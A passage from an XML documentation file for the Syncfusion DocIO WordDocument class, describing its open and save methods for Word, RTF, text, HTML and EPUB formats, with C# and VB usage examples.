        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveEPub(System.IO.Stream,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Saves the document as EPub stream
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveDocx(System.String)">
            <summary>
            Saves the document in open XML format (Docx).
            </summary>
            <param name="fileName"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveWordML(System.String)">
            <summary>
            Saves the document in Word ML format (WordML).
            </summary>
            <param name="fileName">file name to save</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveODT(System.String)">
            <summary>
            Saves the document in open XML format (Odt).
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveDocx(System.IO.Stream)">
            <summary>
            Saves the document in open XML format (Docx).
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveODT(System.IO.Stream)">
            <summary>
            Saves the document in open XML format (Odt).
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveWordML(System.IO.Stream)">
            <summary>
            Saves the document in Word ML format (WordML).
            </summary>
            <param name="stream">stream to save</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveRtf(System.IO.Stream)">
            <summary>
            Saves the RTF.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetRtfText">
            <summary>
            Gets the RTF text.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveTxt(System.IO.Stream)">
            <summary>
            Saves the document in text format.
            </summary>
            <param name="stream">The name of target file</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveTxt(System.IO.Stream,System.Text.Encoding)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>as text (.txt) in Stream with specified encoding.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> to save this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="encoding">The character encoding to use.</param>
            <example>
            <para>The following code example demonstrates how to convert the Word document into text file.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                MemoryStream stream = new MemoryStream();
                //Save the document as Text file
                document.SaveTxt(stream, Encoding.ASCII);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                Dim stream As New MemoryStream()
                'Save the document as Text file
                document.SaveTxt(stream, Encoding.ASCII)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenTxt(System.IO.Stream)">
            <summary>
            Opens the document in text format.
            </summary>
            <param name="stream">The name of target file</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenText(System.String)">
            <summary>
            Opens the text.
            </summary>
            <param name="text">The text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenHTML(System.IO.Stream,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Opens the document in HTML format
            </summary>
            <param name="stream">The file stream</param>
            <param name="validationType">XHTML validation type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenDoc(System.String)">
            <summary>
            Opens doc file.
            </summary>
            <param name="fileName"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Open(System.String)">
            <summary>
            Opens an existing document.
            </summary>
            <param name="fileName">A string that contains the name of the file to open</param>
            <example>
            <para>The following code example demonstrates how to open an existing document from file system.</para>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx");
                //Saves the specified document
                document.Save("Sample.docx");
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx")
                'Saves the specified document
                document.Save("Sample.docx")
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Open(System.String,Syncfusion.DocIO.FormatType)">
            <summary>
            Opens an existing document of the specified file format type.
            </summary>
            <param name="fileName">A string that contains the name of the file to open.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document of the specified type from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx", FormatType.docx);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx", FormatType.docx)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Open(System.String,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType,System.String)">
            <summary>
            Opens an existing document of the specified file format type with HTML file validation options and base path for relative path to absolute path conversion.
            </summary>
            <param name="fileName">A string that contains the name of the file to open.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="validationType">The XHTML validation type used to validate the HTML file, if the <paramref name="formatType"/> is <see cref="!:FormatType.HTML"/>.</param>
            <param name="baseUrl">Base path which is used to convert the relative path in the HTML file to absolute path.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open a protected document of the specified type from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx", FormatType.docx,  XHTMLValidationType.Strict, basePath);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx", FormatType.docx, "password",  XHTMLValidationType.Strict, basePath)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Open(System.String,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Opens an existing document of the specified file format type with HTML file validation options.
            </summary>
            <param name="fileName">A string that contains the name of the file to open.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="validationType">The XHTML validation type used to validate the HTML file, if the <paramref name="formatType"/> is <see cref="!:FormatType.HTML"/>.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open a protected document of the specified type from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx", FormatType.docx,  XHTMLValidationType.Strict);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx", FormatType.docx, "password",  XHTMLValidationType.Strict)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenInternal(System.String,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Opens the HTML document from file.
            </summary>
            <param name="fileName">Name of the file.</param>
            <param name="formatType">Type of the format.</param>
            <param name="validationType">Type of the validation.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Open(System.String,Syncfusion.DocIO.FormatType,System.String)">
            <summary>
            Opens an existing document of the specified file format type, which is protected with password.
            </summary>
            <param name="fileName">A string that contains the name of the file to open.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="password">The password used to decrypt the protected file.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open a protected document of the specified type from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx", FormatType.docx, "password");
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx", FormatType.docx, "password")
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenInternal(System.String,Syncfusion.DocIO.FormatType,System.String)">
            <summary>
            Opens the document from file in XML or Microsoft Word format.
            </summary>
            <param name="fileName">Name of the file.</param>
            <param name="formatType">Type of the format.</param>
            <param name="password">The password.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateFormatType(System.String,Syncfusion.DocIO.FormatType@)">
            <summary>
            Updates the type of the format.
            </summary>
            <param name="fileName">Name of the file.</param>
            <param name="formatType">Type of the format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenReadOnly(System.String,Syncfusion.DocIO.FormatType)">
            <summary>
            Opens an existing document of the specified file format type in read-only mode.
            </summary>
            <param name="strFileName">A string that contains the name of the file to open.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Save(System.String)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> to the specified file.
            </summary>
            <param name="fileName">A string that contains the name of the document to save.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx");
                //Saves the specified document
                document.Save("Sample.docx");
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx")
                'Saves the specified document
                document.Save("Sample.docx")
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Save(System.String,Syncfusion.DocIO.FormatType)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> to the specified file in the specified format.
            </summary>
            <param name="fileName">A string that contains the name of the document to save.</param>
            <param name="formatType">The format in which the document is saved.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx");
                //Saves the specified document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx")
                'Saves the specified document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
            <remarks>If the file name extension mismatches the FormatType parameter specified for saving the document, 
            then the file will be saved in the format specified by FormatType parameter and wrong extension as specified by file name parameter. 
            If the FormatType is specified as Automatic, then the document will be saved in the format specified by file name extension</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveInternal(System.String,Syncfusion.DocIO.FormatType)">
            <summary>
            Saves the document into file in specified format type.
            </summary>
            <param name="fileName">The FileName.</param>
            <param name="formatType">The FormatType.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveAsEpub(System.String,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> as EPUB.
            </summary>
            <param name="fileName">A string that contains the name of the file to save.</param>
            <param name="coverImage">The cover page image of the EPUB.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to convert the Word document to EPub file.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                MemoryStream stream = new MemoryStream();
                //Create the new WPicture for cover page image
                WPicture coverImage = new WPicture(document);
                coverImage.LoadImage(Image.FromFile("CoverImage.png"));
                //Save the document as EPUB
                document.SaveAsEpub("sample.epub", coverImage);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                Dim stream As New MemoryStream()
                'Create the new WPicture for cover page image
                Dim coverImage As New WPicture(document)
                coverImage.LoadImage(Image.FromFile("CoverImage.png"))
                'Save the document as EPUB
                document.SaveAsEpub("sample.epub", coverImage)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveDoc(System.String)">
            <summary>
            Saves the document as Doc format.
            </summary>
            <param name="fileName">Name of the file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Save(System.String,Syncfusion.DocIO.FormatType,System.Web.HttpResponse,Syncfusion.DocIO.HttpContentDisposition)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> to the specified file in the specified format.
            </summary>
            <param name="fileName">A string that contains the name of the document to save.</param>
            <param name="formatType">The format in which the document is saved.</param>
            <param name="response">The HTTP response information.</param>
            <param name="contentDisposition">Specifies options to stream content to browser.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document from file system.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                //Open an existing document from file system
                document.Open("Template.docx");
                //Saves the specified document
                document.Save("Sample.docx", FormatType.Docx, Response, HttpContentDisposition.Attachment);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                'Open an existing document from file system
                document.Open("Template.docx")
                'Saves the specified document
                document.Save("Sample.docx", FormatType.Docx, Response, HttpContentDisposition.Attachment)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
            <remarks>If the file name extension mismatches the FormatType parameter specified for saving the document, 
            then the file will be saved in the format specified by FormatType parameter and wrong extension as specified by file name parameter. 
            If the FormatType is specified as Automatic, then the document will be saved in the format specified by file name extension</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveInternal(System.String,Syncfusion.DocIO.FormatType,System.Web.HttpResponse,Syncfusion.DocIO.HttpContentDisposition)">
            <summary>
            Saves the specified file name.
            </summary>
            <param name="fileName">The FileName.</param>
            <param name="formatType">The FormatType.</param>
            <param name="response">The response.</param>
            <param name="contentDisposition">The content disposition.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveAsEpub(System.String,Syncfusion.DocIO.DLS.WPicture,System.Web.HttpResponse,Syncfusion.DocIO.HttpContentDisposition)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> as EPUB.
            </summary>
            <param name="fileName">A string that contains the name of the file to save.</param>
            <param name="coverImage">The cover page image of the EPUB.</param>
            <param name="response">The HTTP response information.</param>
            <param name="contentDisposition">Specifies options to stream content to browser.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to </para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                MemoryStream stream = new MemoryStream();
                //Create the new WPicture for cover page image
                WPicture coverImage = new WPicture(document);
                coverImage.LoadImage(Image.FromFile("CoverImage.png"));
                //Save the document as EPUB
                document.SaveAsEpub("sample.epub", coverImage, Response, HttpContentDisposition.Attachment);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                Dim stream As New MemoryStream()
                'Create the new WPicture for cover page image
                Dim coverImage As New WPicture(document)
                coverImage.LoadImage(Image.FromFile("CoverImage.png"))
                'Save the document as EPUB
                document.SaveAsEpub("sample.epub", coverImage, Response, HttpContentDisposition.Attachment)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveDot(System.String)">
            <summary>
            Saves the dot.
            </summary>
            <param name="fileName">Name of the file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveRtf(System.String)">
            <summary>
            Saves the document in RTF format.
            </summary>
            <param name="fileName">Name of the file.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Open(System.IO.Stream,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType,System.String)">
            <summary>
            Opens an existing document of the specified file format type from the data stream with HTML file validation options and base path for relative path to absolute path conversion.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="validationType">The XHTML validation type used to validate the html file, if the <paramref name="formatType"/> is <see cref="!:FormatType.HTML"/>.</param>
            <param name="baseUrl">Base path which is used to convert the relative path in the HTML file to absolute path.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document of the specified type from data stream with XHTML validation options.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                Stream fileStream = new FileStream("Sample.html", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Open an existing document from file system
                document.Open(fileStream, FormatType.docx,  XHTMLValidationType.Strict, basepath);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                Dim fileStream As Stream = New FileStream("Sample.html", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Open an existing document from file system
                document.Open(fileStream, FormatType.docx,  XHTMLValidationType.Strict, basepath)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Open(System.IO.Stream,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Opens an existing document of the specified file format type from the data stream with HTML validation options.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="validationType">The XHTML validation type used to validate the HTML file, if the <paramref name="formatType"/> is <see cref="!:FormatType.HTML"/>.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, UNiversal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open an existing document of the specified type from data stream with XHTML validation options.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                Stream fileStream = new FileStream("Sample.html", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Open an existing document from file system
                document.Open(fileStream, FormatType.docx,  XHTMLValidationType.Strict);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                Dim fileStream As Stream = New FileStream("Sample.html", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Open an existing document from file system
                document.Open(fileStream, FormatType.docx,  XHTMLValidationType.Strict)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenInternal(System.IO.Stream,Syncfusion.DocIO.FormatType,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Opens the HTML document from stream.
            </summary>
            <param name="stream">The stream.</param>
            <param name="formatType">Type of the format.</param>
            <param name="validationType">Type of the validation.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Open(System.IO.Stream,Syncfusion.DocIO.FormatType)">
            <summary>
            Opens an existing document of the specified file format type from the data stream.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <example>
            <para>The following code example demonstrates how to open an existing document of the specified type from data stream.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                Stream fileStream = new FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Open an existing document from file system
                document.Open(fileStream, FormatType.docx);
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                Dim fileStream As Stream = New FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Open an existing document from file system
                document.Open(fileStream, FormatType.docx)
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Open(System.IO.Stream,Syncfusion.DocIO.FormatType,System.String)">
            <summary>
            Opens an existing document of the specified file format type from the data stream, which is protected with password.
            </summary>
            <param name="stream">A <see cref="T:System.IO.Stream"/> that contains the data for this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/>.</param>
            <param name="formatType">The file format type of the document to open.</param>
            <param name="password">The password used to decrypt the document.</param>
            <remarks>This method is not supported in MVC6 and Xamarin platforms.</remarks>
            <example>
            <para>The following code example demonstrates how to open a protected document of the specified type from data stream.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an new instance of WordDocument class
                WordDocument document = new WordDocument();
                Stream fileStream = new FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read);
                //Open an existing document from file system
                document.Open(fileStream, FormatType.docx, "password");
                //Saves the specified document
                document.Save("Sample.docx", FormatType.docx);
                //Close the WordDocument instance
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an new instance of WordDocument class
                Dim document As New WordDocument()
                Dim fileStream As Stream = New FileStream("Sample.docx", FileMode.Open, FileAccess.Read, FileShare.Read)
                'Open an existing document from file system
                document.Open(fileStream, FormatType.docx, "password")
                'Saves the specified document
                document.Save("Sample.docx", FormatType.docx)
                'Close the WordDocument instance
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenInternal(System.IO.Stream,Syncfusion.DocIO.FormatType,System.String)">
            <summary>
            Opens the document from stream.
            </summary>
            <param name="stream">The Stream.</param>
            <param name="formatType">The FormatType.</param>
            <param name="password">The Password.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenRtf(System.IO.Stream)">
            <summary>
            Open an Rtf file
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.OpenRtf(System.String)">
            <summary>
            Opens the RTF.
            </summary>
            <param name="rtfText">The RTF text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.UpdateFormatType(System.IO.Stream,Syncfusion.DocIO.FormatType@)">
            <summary>
            Updates the type of the format.
            </summary>
            <param name="stream">The stream.</param>
            <param name="formatType">Type of the format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.Save(System.IO.Stream,Syncfusion.DocIO.FormatType)">
            <summary>
            Saves this <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> to the specified stream in the specified file format type.
            </summary>
            <param name="stream">The Stream where the document will be saved.</param>
            <param name="formatType">The format in which the document is saved.</param>
            <example>
            <para>The following code example demonstrates how to save the document to <c>MemoryStream</c></para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                MemoryStream stream = new MemoryStream();
                //Save the document to stream
                document.Save(stream, FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                Dim stream As New MemoryStream()
                'Save the document to stream
                document.Save(stream, FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetAsRoman(System.Int32)">
            <summary>
             Get the roman value for the number
            </summary>
            <param name="number"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetAsLetter(System.Int32)">
            <summary>
            To Get alphabet letter
            </summary>
            <param name="number"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.SaveInternal(System.IO.Stream,Syncfusion.DocIO.FormatType)">
            <summary>
            Saves the document into stream in specified format type.
            </summary>
            <param name="stream">The Stream.</param>
            <param name="formatType">The FormatType.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetOrdinal(System.Int32,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Get's Ordinal List Value
            </summary>
            <param name="num"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetOrdinalInSwedish(System.Int32)">
            <summary>
            Get's Ordinal in Swedish
            </summary>
            <param name="num"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetOrdinalInCatalan(System.Int32)">
            <summary>
            Get's Ordinal in Catalan
            </summary>
            <param name="num"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetOrdinalInDanish(System.Int32)">
            <summary>
            Get's Ordinal in Danish
            </summary>
            <param name="num"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordDocument.GetOrdinalInEnglish(System.Int32)">
            <summary>
